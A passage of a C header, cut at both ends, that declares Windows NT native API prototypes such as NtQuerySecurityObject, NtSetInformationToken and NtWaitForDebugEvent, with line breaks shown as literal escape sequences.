WorkerFactoryInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryInstallUILanguage(\r\n\tOUT PLANGID InstallUILanguageId);\r\n\r\nEXTERN_C NTSTATUS NtQueryIntervalProfile(\r\n\tIN KPROFILE_SOURCE ProfileSource,\r\n\tOUT PULONG Interval);\r\n\r\nEXTERN_C NTSTATUS NtQueryIoCompletion(\r\n\tIN HANDLE IoCompletionHandle,\r\n\tIN IO_COMPLETION_INFORMATION_CLASS IoCompletionInformationClass,\r\n\tOUT PVOID IoCompletionInformation,\r\n\tIN ULONG IoCompletionInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryLicenseValue(\r\n\tIN PUNICODE_STRING ValueName,\r\n\tOUT PULONG Type OPTIONAL,\r\n\tOUT PVOID SystemData OPTIONAL,\r\n\tIN ULONG DataSize,\r\n\tOUT PULONG ResultDataSize);\r\n\r\nEXTERN_C NTSTATUS NtQueryMultipleValueKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN OUT PKEY_VALUE_ENTRY ValueEntries,\r\n\tIN ULONG EntryCount,\r\n\tOUT PVOID ValueBuffer,\r\n\tIN PULONG BufferLength,\r\n\tOUT PULONG RequiredBufferLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryMutant(\r\n\tIN HANDLE MutantHandle,\r\n\tIN MUTANT_INFORMATION_CLASS MutantInformationClass,\r\n\tOUT PVOID MutantInformation,\r\n\tIN ULONG MutantInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryOpenSubKeys(\r\n\tIN POBJECT_ATTRIBUTES TargetKey,\r\n\tOUT PULONG HandleCount);\r\n\r\nEXTERN_C NTSTATUS NtQueryOpenSubKeysEx(\r\n\tIN POBJECT_ATTRIBUTES TargetKey,\r\n\tIN ULONG BufferLength,\r\n\tOUT PVOID Buffer,\r\n\tOUT PULONG RequiredSize);\r\n\r\nEXTERN_C NTSTATUS NtQueryPortInformationProcess();\r\n\r\nEXTERN_C NTSTATUS NtQueryQuotaInformationFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tOUT PFILE_USER_QUOTA_INFORMATION Buffer,\r\n\tIN ULONG Length,\r\n\tIN BOOLEAN ReturnSingleEntry,\r\n\tIN PFILE_QUOTA_LIST_INFORMATION SidList OPTIONAL,\r\n\tIN ULONG SidListLength,\r\n\tIN PSID StartSid OPTIONAL,\r\n\tIN BOOLEAN RestartScan);\r\n\r\nEXTERN_C NTSTATUS NtQuerySecurityAttributesToken(\r\n\tIN HANDLE TokenHandle,\r\n\tIN PUNICODE_STRING Attributes OPTIONAL,\r\n\tIN ULONG NumberOfAttributes,\r\n\tOUT PVOID Buffer,\r\n\tIN ULONG Length,\r\n\tOUT PULONG ReturnLength);\r\n\r\nEXTERN_C NTSTATUS NtQuerySecurityObject(\r\n\tIN HANDLE Handle,\r\n\tIN SECURITY_INFORMATION SecurityInformation,\r\n\tOUT PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,\r\n\tIN ULONG Length,\r\n\tOUT PULONG LengthNeeded);\r\n\r\nEXTERN_C NTSTATUS NtQuerySecurityPolicy(\r\n\tIN ULONG_PTR UnknownParameter1,\r\n\tIN ULONG_PTR UnknownParameter2,\r\n\tIN ULONG_PTR UnknownParameter3,\r\n\tIN ULONG_PTR UnknownParameter4,\r\n\tIN ULONG_PTR UnknownParameter5,\r\n\tIN ULONG_PTR UnknownParameter6);\r\n\r\nEXTERN_C NTSTATUS NtQuerySemaphore(\r\n\tIN HANDLE SemaphoreHandle,\r\n\tIN SEMAPHORE_INFORMATION_CLASS SemaphoreInformationClass,\r\n\tOUT PVOID SemaphoreInformation,\r\n\tIN ULONG SemaphoreInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQuerySymbolicLinkObject(\r\n\tIN HANDLE LinkHandle,\r\n\tIN OUT PUNICODE_STRING LinkTarget,\r\n\tOUT PULONG ReturnedLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQuerySystemEnvironmentValue(\r\n\tIN PUNICODE_STRING VariableName,\r\n\tOUT PVOID VariableValue,\r\n\tIN ULONG ValueLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQuerySystemEnvironmentValueEx(\r\n\tIN PUNICODE_STRING VariableName,\r\n\tIN LPGUID VendorGuid,\r\n\tOUT PVOID Value OPTIONAL,\r\n\tIN OUT PULONG ValueLength,\r\n\tOUT PULONG Attributes OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQuerySystemInformationEx(\r\n\tIN SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n\tIN PVOID InputBuffer,\r\n\tIN ULONG InputBufferLength,\r\n\tOUT PVOID SystemInformation OPTIONAL,\r\n\tIN ULONG SystemInformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtQueryTimerResolution(\r\n\tOUT PULONG MaximumTime,\r\n\tOUT PULONG MinimumTime,\r\n\tOUT PULONG CurrentTime);\r\n\r\nEXTERN_C NTSTATUS NtQueryWnfStateData(\r\n\tIN PCWNF_STATE_NAME StateName,\r\n\tIN PCWNF_TYPE_ID TypeId OPTIONAL,\r\n\tIN PVOID ExplicitScope OPTIONAL,\r\n\tOUT PWNF_CHANGE_STAMP ChangeStamp,\r\n\tOUT PVOID Buffer OPTIONAL,\r\n\tIN OUT PULONG BufferSize);\r\n\r\nEXTERN_C NTSTATUS NtQueryWnfStateNameInformation(\r\n\tIN PCWNF_STATE_NAME StateName,\r\n\tIN PCWNF_TYPE_ID NameInfoClass,\r\n\tIN PVOID ExplicitScope OPTIONAL,\r\n\tOUT PVOID InfoBuffer,\r\n\tIN ULONG InfoBufferSize);\r\n\r\nEXTERN_C NTSTATUS NtQueueApcThreadEx(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN HANDLE UserApcReserveHandle OPTIONAL,\r\n\tIN PKNORMAL_ROUTINE ApcRoutine,\r\n\tIN PVOID ApcArgument1 OPTIONAL,\r\n\tIN PVOID ApcArgument2 OPTIONAL,\r\n\tIN PVOID ApcArgument3 OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtRaiseException(\r\n\tIN PEXCEPTION_RECORD ExceptionRecord,\r\n\tIN PCONTEXT ContextRecord,\r\n\tIN BOOLEAN FirstChance);\r\n\r\nEXTERN_C NTSTATUS NtRaiseHardError(\r\n\tIN NTSTATUS ErrorStatus,\r\n\tIN ULONG NumberOfParameters,\r\n\tIN ULONG UnicodeStringParameterMask,\r\n\tIN PULONG_PTR Parameters,\r\n\tIN ULONG ValidResponseOptions,\r\n\tOUT PULONG Response);\r\n\r\nEXTERN_C NTSTATUS NtReadOnlyEnlistment(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtRecoverEnlistment(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN PVOID EnlistmentKey OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtRecoverResourceManager(\r\n\tIN HANDLE ResourceManagerHandle);\r\n\r\nEXTERN_C NTSTATUS NtRecoverTransactionManager(\r\n\tIN HANDLE TransactionManagerHandle);\r\n\r\nEXTERN_C NTSTATUS NtRegisterProtocolAddressInformation(\r\n\tIN HANDLE ResourceManager,\r\n\tIN LPGUID ProtocolId,\r\n\tIN ULONG ProtocolInformationSize,\r\n\tIN PVOID ProtocolInformation,\r\n\tIN ULONG CreateOptions OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtRegisterThreadTerminatePort(\r\n\tIN HANDLE PortHandle);\r\n\r\nEXTERN_C NTSTATUS NtReleaseKeyedEvent(\r\n\tIN HANDLE KeyedEventHandle,\r\n\tIN PVOID KeyValue,\r\n\tIN BOOLEAN Alertable,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtReleaseWorkerFactoryWorker(\r\n\tIN HANDLE WorkerFactoryHandle);\r\n\r\nEXTERN_C NTSTATUS NtRemoveIoCompletionEx(\r\n\tIN HANDLE IoCompletionHandle,\r\n\tOUT PFILE_IO_COMPLETION_INFORMATION IoCompletionInformation,\r\n\tIN ULONG Count,\r\n\tOUT PULONG NumEntriesRemoved,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL,\r\n\tIN BOOLEAN Alertable);\r\n\r\nEXTERN_C NTSTATUS NtRemoveProcessDebug(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN HANDLE DebugObjectHandle);\r\n\r\nEXTERN_C NTSTATUS NtRenameKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN PUNICODE_STRING NewName);\r\n\r\nEXTERN_C NTSTATUS NtRenameTransactionManager(\r\n\tIN PUNICODE_STRING LogFileName,\r\n\tIN LPGUID ExistingTransactionManagerGuid);\r\n\r\nEXTERN_C NTSTATUS NtReplaceKey(\r\n\tIN POBJECT_ATTRIBUTES NewFile,\r\n\tIN HANDLE TargetHandle,\r\n\tIN POBJECT_ATTRIBUTES OldFile);\r\n\r\nEXTERN_C NTSTATUS NtReplacePartitionUnit(\r\n\tIN PUNICODE_STRING TargetInstancePath,\r\n\tIN PUNICODE_STRING SpareInstancePath,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtReplyWaitReplyPort(\r\n\tIN HANDLE PortHandle,\r\n\tIN OUT PPORT_MESSAGE ReplyMessage);\r\n\r\nEXTERN_C NTSTATUS NtRequestPort(\r\n\tIN HANDLE PortHandle,\r\n\tIN PPORT_MESSAGE RequestMessage);\r\n\r\nEXTERN_C NTSTATUS NtResetEvent(\r\n\tIN HANDLE EventHandle,\r\n\tOUT PULONG PreviousState OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtResetWriteWatch(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress,\r\n\tIN ULONG RegionSize);\r\n\r\nEXTERN_C NTSTATUS NtRestoreKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN HANDLE FileHandle,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtResumeProcess(\r\n\tIN HANDLE ProcessHandle);\r\n\r\nEXTERN_C NTSTATUS NtRevertContainerImpersonation();\r\n\r\nEXTERN_C NTSTATUS NtRollbackComplete(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtRollbackEnlistment(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtRollbackRegistryTransaction(\r\n\tIN HANDLE RegistryHandle,\r\n\tIN BOOL Wait);\r\n\r\nEXTERN_C NTSTATUS NtRollbackTransaction(\r\n\tIN HANDLE TransactionHandle,\r\n\tIN BOOLEAN Wait);\r\n\r\nEXTERN_C NTSTATUS NtRollforwardTransactionManager(\r\n\tIN HANDLE TransactionManagerHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSaveKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN HANDLE FileHandle);\r\n\r\nEXTERN_C NTSTATUS NtSaveKeyEx(\r\n\tIN HANDLE KeyHandle,\r\n\tIN HANDLE FileHandle,\r\n\tIN ULONG Format);\r\n\r\nEXTERN_C NTSTATUS NtSaveMergedKeys(\r\n\tIN HANDLE HighPrecedenceKeyHandle,\r\n\tIN HANDLE LowPrecedenceKeyHandle,\r\n\tIN HANDLE FileHandle);\r\n\r\nEXTERN_C NTSTATUS NtSecureConnectPort(\r\n\tOUT PHANDLE PortHandle,\r\n\tIN PUNICODE_STRING PortName,\r\n\tIN PSECURITY_QUALITY_OF_SERVICE SecurityQos,\r\n\tIN OUT PPORT_SECTION_WRITE ClientView OPTIONAL,\r\n\tIN PSID RequiredServerSid OPTIONAL,\r\n\tIN OUT PPORT_SECTION_READ ServerView OPTIONAL,\r\n\tOUT PULONG MaxMessageLength OPTIONAL,\r\n\tIN OUT PVOID ConnectionInformation OPTIONAL,\r\n\tIN OUT PULONG ConnectionInformationLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSerializeBoot();\r\n\r\nEXTERN_C NTSTATUS NtSetBootEntryOrder(\r\n\tIN PULONG Ids,\r\n\tIN ULONG Count);\r\n\r\nEXTERN_C NTSTATUS NtSetBootOptions(\r\n\tIN PBOOT_OPTIONS BootOptions,\r\n\tIN ULONG FieldsToChange);\r\n\r\nEXTERN_C NTSTATUS NtSetCachedSigningLevel(\r\n\tIN ULONG Flags,\r\n\tIN SE_SIGNING_LEVEL InputSigningLevel,\r\n\tIN PHANDLE SourceFiles,\r\n\tIN ULONG SourceFileCount,\r\n\tIN HANDLE TargetFile OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSetCachedSigningLevel2(\r\n\tIN ULONG Flags,\r\n\tIN ULONG InputSigningLevel,\r\n\tIN PHANDLE SourceFiles,\r\n\tIN ULONG SourceFileCount,\r\n\tIN HANDLE TargetFile OPTIONAL,\r\n\tIN PVOID LevelInformation OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSetContextThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tIN PCONTEXT Context);\r\n\r\nEXTERN_C NTSTATUS NtSetDebugFilterState(\r\n\tIN ULONG ComponentId,\r\n\tIN ULONG Level,\r\n\tIN BOOLEAN State);\r\n\r\nEXTERN_C NTSTATUS NtSetDefaultHardErrorPort(\r\n\tIN HANDLE PortHandle);\r\n\r\nEXTERN_C NTSTATUS NtSetDefaultLocale(\r\n\tIN BOOLEAN UserProfile,\r\n\tIN LCID DefaultLocaleId);\r\n\r\nEXTERN_C NTSTATUS NtSetDefaultUILanguage(\r\n\tIN LANGID DefaultUILanguageId);\r\n\r\nEXTERN_C NTSTATUS NtSetDriverEntryOrder(\r\n\tIN PULONG Ids,\r\n\tIN PULONG Count);\r\n\r\nEXTERN_C NTSTATUS NtSetEaFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PFILE_FULL_EA_INFORMATION EaBuffer,\r\n\tIN ULONG EaBufferSize);\r\n\r\nEXTERN_C NTSTATUS NtSetHighEventPair(\r\n\tIN HANDLE EventPairHandle);\r\n\r\nEXTERN_C NTSTATUS NtSetHighWaitLowEventPair(\r\n\tIN HANDLE EventPairHandle);\r\n\r\nEXTERN_C NTSTATUS NtSetIRTimer(\r\n\tIN HANDLE TimerHandle,\r\n\tIN PLARGE_INTEGER DueTime OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationDebugObject(\r\n\tIN HANDLE DebugObject,\r\n\tIN DEBUGOBJECTINFOCLASS InformationClass,\r\n\tIN PVOID Information,\r\n\tIN ULONG InformationLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationEnlistment(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN ENLISTMENT_INFORMATION_CLASS EnlistmentInformationClass,\r\n\tIN PVOID EnlistmentInformation,\r\n\tIN ULONG EnlistmentInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationJobObject(\r\n\tIN HANDLE JobHandle,\r\n\tIN JOBOBJECTINFOCLASS JobObjectInformationClass,\r\n\tIN PVOID JobObjectInformation,\r\n\tIN ULONG JobObjectInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationKey(\r\n\tIN HANDLE KeyHandle,\r\n\tIN KEY_SET_INFORMATION_CLASS KeySetInformationClass,\r\n\tIN PVOID KeySetInformation,\r\n\tIN ULONG KeySetInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationResourceManager(\r\n\tIN HANDLE ResourceManagerHandle,\r\n\tIN RESOURCEMANAGER_INFORMATION_CLASS ResourceManagerInformationClass,\r\n\tIN PVOID ResourceManagerInformation,\r\n\tIN ULONG ResourceManagerInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationSymbolicLink(\r\n\tIN HANDLE Handle,\r\n\tIN ULONG Class,\r\n\tIN PVOID Buffer,\r\n\tIN ULONG BufferLength);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationToken(\r\n\tIN HANDLE TokenHandle,\r\n\tIN TOKEN_INFORMATION_CLASS TokenInformationClass,\r\n\tIN PVOID TokenInformation,\r\n\tIN ULONG TokenInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationTransaction(\r\n\tIN HANDLE TransactionHandle,\r\n\tIN TRANSACTIONMANAGER_INFORMATION_CLASS TransactionInformationClass,\r\n\tIN PVOID TransactionInformation,\r\n\tIN ULONG TransactionInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationTransactionManager(\r\n\tIN HANDLE TransactionHandle,\r\n\tIN TRANSACTION_INFORMATION_CLASS TransactionInformationClass,\r\n\tIN PVOID TransactionInformation,\r\n\tIN ULONG TransactionInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN VIRTUAL_MEMORY_INFORMATION_CLASS VmInformationClass,\r\n\tIN ULONG_PTR NumberOfEntries,\r\n\tIN PMEMORY_RANGE_ENTRY VirtualAddresses,\r\n\tIN PVOID VmInformation,\r\n\tIN ULONG VmInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetInformationWorkerFactory(\r\n\tIN HANDLE WorkerFactoryHandle,\r\n\tIN WORKERFACTORYINFOCLASS WorkerFactoryInformationClass,\r\n\tIN PVOID WorkerFactoryInformation,\r\n\tIN ULONG WorkerFactoryInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetIntervalProfile(\r\n\tIN ULONG Interval,\r\n\tIN KPROFILE_SOURCE Source);\r\n\r\nEXTERN_C NTSTATUS NtSetIoCompletion(\r\n\tIN HANDLE IoCompletionHandle,\r\n\tIN ULONG CompletionKey,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN NTSTATUS CompletionStatus,\r\n\tIN ULONG NumberOfBytesTransfered);\r\n\r\nEXTERN_C NTSTATUS NtSetIoCompletionEx(\r\n\tIN HANDLE IoCompletionHandle,\r\n\tIN HANDLE IoCompletionPacketHandle,\r\n\tIN PVOID KeyContext OPTIONAL,\r\n\tIN PVOID ApcContext OPTIONAL,\r\n\tIN NTSTATUS IoStatus,\r\n\tIN ULONG_PTR IoStatusInformation);\r\n\r\nEXTERN_C NTSTATUS NtSetLdtEntries(\r\n\tIN ULONG Selector0,\r\n\tIN ULONG Entry0Low,\r\n\tIN ULONG Entry0Hi,\r\n\tIN ULONG Selector1,\r\n\tIN ULONG Entry1Low,\r\n\tIN ULONG Entry1Hi);\r\n\r\nEXTERN_C NTSTATUS NtSetLowEventPair(\r\n\tIN HANDLE EventPairHandle);\r\n\r\nEXTERN_C NTSTATUS NtSetLowWaitHighEventPair(\r\n\tIN HANDLE EventPairHandle);\r\n\r\nEXTERN_C NTSTATUS NtSetQuotaInformationFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PFILE_USER_QUOTA_INFORMATION Buffer,\r\n\tIN ULONG Length);\r\n\r\nEXTERN_C NTSTATUS NtSetSecurityObject(\r\n\tIN HANDLE ObjectHandle,\r\n\tIN SECURITY_INFORMATION SecurityInformationClass,\r\n\tIN PSECURITY_DESCRIPTOR DescriptorBuffer);\r\n\r\nEXTERN_C NTSTATUS NtSetSystemEnvironmentValue(\r\n\tIN PUNICODE_STRING VariableName,\r\n\tIN PUNICODE_STRING Value);\r\n\r\nEXTERN_C NTSTATUS NtSetSystemEnvironmentValueEx(\r\n\tIN PUNICODE_STRING VariableName,\r\n\tIN LPGUID VendorGuid,\r\n\tIN PVOID Value OPTIONAL,\r\n\tIN ULONG ValueLength,\r\n\tIN ULONG Attributes);\r\n\r\nEXTERN_C NTSTATUS NtSetSystemInformation(\r\n\tIN SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n\tIN PVOID SystemInformation,\r\n\tIN ULONG SystemInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetSystemPowerState(\r\n\tIN POWER_ACTION SystemAction,\r\n\tIN SYSTEM_POWER_STATE MinSystemState,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtSetSystemTime(\r\n\tIN PLARGE_INTEGER SystemTime,\r\n\tOUT PLARGE_INTEGER PreviousTime OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSetThreadExecutionState(\r\n\tIN EXECUTION_STATE ExecutionState,\r\n\tOUT PEXECUTION_STATE PreviousExecutionState);\r\n\r\nEXTERN_C NTSTATUS NtSetTimer2(\r\n\tIN HANDLE TimerHandle,\r\n\tIN PLARGE_INTEGER DueTime,\r\n\tIN PLARGE_INTEGER Period OPTIONAL,\r\n\tIN PT2_SET_PARAMETERS Parameters);\r\n\r\nEXTERN_C NTSTATUS NtSetTimerEx(\r\n\tIN HANDLE TimerHandle,\r\n\tIN TIMER_SET_INFORMATION_CLASS TimerSetInformationClass,\r\n\tIN OUT PVOID TimerSetInformation OPTIONAL,\r\n\tIN ULONG TimerSetInformationLength);\r\n\r\nEXTERN_C NTSTATUS NtSetTimerResolution(\r\n\tIN ULONG DesiredResolution,\r\n\tIN BOOLEAN SetResolution,\r\n\tOUT PULONG CurrentResolution);\r\n\r\nEXTERN_C NTSTATUS NtSetUuidSeed(\r\n\tIN PUCHAR Seed);\r\n\r\nEXTERN_C NTSTATUS NtSetVolumeInformationFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PVOID FileSystemInformation,\r\n\tIN ULONG Length,\r\n\tIN FSINFOCLASS FileSystemInformationClass);\r\n\r\nEXTERN_C NTSTATUS NtSetWnfProcessNotificationEvent(\r\n\tIN HANDLE NotificationEvent);\r\n\r\nEXTERN_C NTSTATUS NtShutdownSystem(\r\n\tIN SHUTDOWN_ACTION Action);\r\n\r\nEXTERN_C NTSTATUS NtShutdownWorkerFactory(\r\n\tIN HANDLE WorkerFactoryHandle,\r\n\tIN OUT PLONG PendingWorkerCount);\r\n\r\nEXTERN_C NTSTATUS NtSignalAndWaitForSingleObject(\r\n\tIN HANDLE hObjectToSignal,\r\n\tIN HANDLE hObjectToWaitOn,\r\n\tIN BOOLEAN bAlertable,\r\n\tIN PLARGE_INTEGER dwMilliseconds OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSinglePhaseReject(\r\n\tIN HANDLE EnlistmentHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtStartProfile(\r\n\tIN HANDLE ProfileHandle);\r\n\r\nEXTERN_C NTSTATUS NtStopProfile(\r\n\tIN HANDLE ProfileHandle);\r\n\r\nEXTERN_C NTSTATUS NtSubscribeWnfStateChange(\r\n\tIN PCWNF_STATE_NAME StateName,\r\n\tIN WNF_CHANGE_STAMP ChangeStamp OPTIONAL,\r\n\tIN ULONG EventMask,\r\n\tOUT PLARGE_INTEGER SubscriptionId OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtSuspendProcess(\r\n\tIN HANDLE ProcessHandle);\r\n\r\nEXTERN_C NTSTATUS NtSuspendThread(\r\n\tIN HANDLE ThreadHandle,\r\n\tOUT PULONG PreviousSuspendCount);\r\n\r\nEXTERN_C NTSTATUS NtSystemDebugControl(\r\n\tIN DEBUG_CONTROL_CODE Command,\r\n\tIN PVOID InputBuffer OPTIONAL,\r\n\tIN ULONG InputBufferLength,\r\n\tOUT PVOID OutputBuffer OPTIONAL,\r\n\tIN ULONG OutputBufferLength,\r\n\tOUT PULONG ReturnLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtTerminateEnclave(\r\n\tIN PVOID BaseAddress,\r\n\tIN BOOLEAN WaitForThread);\r\n\r\nEXTERN_C NTSTATUS NtTerminateJobObject(\r\n\tIN HANDLE JobHandle,\r\n\tIN NTSTATUS ExitStatus);\r\n\r\nEXTERN_C NTSTATUS NtTestAlert();\r\n\r\nEXTERN_C NTSTATUS NtThawRegistry();\r\n\r\nEXTERN_C NTSTATUS NtThawTransactions();\r\n\r\nEXTERN_C NTSTATUS NtTraceControl(\r\n\tIN ULONG FunctionCode,\r\n\tIN PVOID InputBuffer OPTIONAL,\r\n\tIN ULONG InputBufferLength,\r\n\tOUT PVOID OutputBuffer OPTIONAL,\r\n\tIN ULONG OutputBufferLength,\r\n\tOUT PULONG ReturnLength);\r\n\r\nEXTERN_C NTSTATUS NtTranslateFilePath(\r\n\tIN PFILE_PATH InputFilePath,\r\n\tIN ULONG OutputType,\r\n\tOUT PFILE_PATH OutputFilePath OPTIONAL,\r\n\tIN OUT PULONG OutputFilePathLength OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtUmsThreadYield(\r\n\tIN PVOID SchedulerParam);\r\n\r\nEXTERN_C NTSTATUS NtUnloadDriver(\r\n\tIN PUNICODE_STRING DriverServiceName);\r\n\r\nEXTERN_C NTSTATUS NtUnloadKey(\r\n\tIN POBJECT_ATTRIBUTES DestinationKeyName);\r\n\r\nEXTERN_C NTSTATUS NtUnloadKey2(\r\n\tIN POBJECT_ATTRIBUTES TargetKey,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtUnloadKeyEx(\r\n\tIN POBJECT_ATTRIBUTES TargetKey,\r\n\tIN HANDLE Event OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtUnlockFile(\r\n\tIN HANDLE FileHandle,\r\n\tOUT PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN PULARGE_INTEGER ByteOffset,\r\n\tIN PULARGE_INTEGER Length,\r\n\tIN ULONG Key);\r\n\r\nEXTERN_C NTSTATUS NtUnlockVirtualMemory(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID* BaseAddress,\r\n\tIN PSIZE_T NumberOfBytesToUnlock,\r\n\tIN ULONG LockType);\r\n\r\nEXTERN_C NTSTATUS NtUnmapViewOfSectionEx(\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID BaseAddress OPTIONAL,\r\n\tIN ULONG Flags);\r\n\r\nEXTERN_C NTSTATUS NtUnsubscribeWnfStateChange(\r\n\tIN PCWNF_STATE_NAME StateName);\r\n\r\nEXTERN_C NTSTATUS NtUpdateWnfStateData(\r\n\tIN PCWNF_STATE_NAME StateName,\r\n\tIN PVOID Buffer OPTIONAL,\r\n\tIN ULONG Length OPTIONAL,\r\n\tIN PCWNF_TYPE_ID TypeId OPTIONAL,\r\n\tIN PVOID ExplicitScope OPTIONAL,\r\n\tIN WNF_CHANGE_STAMP MatchingChangeStamp,\r\n\tIN ULONG CheckStamp);\r\n\r\nEXTERN_C NTSTATUS NtVdmControl(\r\n\tIN VDMSERVICECLASS Service,\r\n\tIN OUT PVOID ServiceData);\r\n\r\nEXTERN_C NTSTATUS NtWaitForAlertByThreadId(\r\n\tIN HANDLE Handle,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtWaitForDebugEvent(\r\n\tIN HANDLE DebugObjectHandle,\r\n\tIN BOOLEAN Alertable,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL,\r\n\tOUT PVOID WaitStateChange);\r\n\r\nEXTERN_C NTSTATUS NtWaitForKeyedEvent(\r\n\tIN HANDLE KeyedEventHandle,\r\n\tIN PVOID Key,\r\n\tIN BOOLEAN Alertable,\r\n\tIN PLARGE_INTEGER Timeout OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtWaitForWorkViaWorkerFactory(\r\n\tIN HANDLE WorkerFactoryHandle,\r\n\tOUT PVOID MiniPacket);\r\n\r\nEXTERN_C NTSTATUS NtWaitHighEventPair(\r\n\tIN HANDLE EventHandle);\r\n\r\nEXTERN_C NTSTATUS NtWaitLowEventPair(\r\n\tIN HANDLE EventHandle);\r\n\r\nEXTERN_C NTSTATUS NtAcquireCMFViewOwnership(\r\n\tOUT BOOLEAN TimeStamp,\r\n\tOUT BOOLEAN TokenTaken,\r\n\tIN BOOLEAN ReplaceExisting);\r\n\r\nEXTERN_C NTSTATUS NtCancelDeviceWakeupRequest(\r\n\tIN HANDLE DeviceHandle);\r\n\r\nEXTERN_C NTSTATUS NtClearAllSavepointsTransaction(\r\n\tIN HANDLE TransactionHandle);\r\n\r\nEXTERN_C NTSTATUS NtClearSavepointTransaction(\r\n\tIN HANDLE TransactionHandle,\r\n\tIN ULONG SavePointId);\r\n\r\nEXTERN_C NTSTATUS NtRollbackSavepointTransaction(\r\n\tIN HANDLE TransactionHandle,\r\n\tIN ULONG SavePointId);\r\n\r\nEXTERN_C NTSTATUS NtSavepointTransaction(\r\n\tIN HANDLE TransactionHandle,\r\n\tIN BOOLEAN Flag,\r\n\tOUT ULONG SavePointId);\r\n\r\nEXTERN_C NTSTATUS NtSavepointComplete(\r\n\tIN HANDLE TransactionHandle,\r\n\tIN PLARGE_INTEGER TmVirtualClock OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateSectionEx(\r\n\tOUT PHANDLE SectionHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN 